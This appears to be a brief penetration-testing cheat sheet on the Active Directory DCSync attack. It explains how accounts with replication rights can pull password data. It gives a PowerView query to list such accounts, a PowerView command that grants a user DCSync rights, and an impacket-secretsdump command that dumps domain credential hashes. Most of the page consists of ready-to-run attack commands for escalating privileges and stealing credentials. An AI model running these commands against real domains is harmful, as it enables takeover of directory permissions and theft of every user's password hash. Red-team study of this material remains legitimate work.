dcsync
Allows an attacker to simulate the behavior of Domain Controller (DC) in order to retrieve password data via domain replication. Any member of Administrators, Domain Admins, or Enterprise Admins as well as Domain Controller computer accounts are able to run DCSync to pull password data.
Check for users with DCSync
Get-ObjectAcl -DistinguishedName "dc=DOMAIN,dc=COM" -ResolveGUIDs | ?{($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll')}
Usage
using powerview
Add-ObjectACL -TargetDistinguishedName "dc=DOMAIN,dc=COM" -PrincipalIdentity USER -Rights DCSync
post DCSync
impacket-secretsdump DOMAIN/USER:['PASS']@IP [-just-dc] [just-dc-user USER]
Last updated
Was this helpful?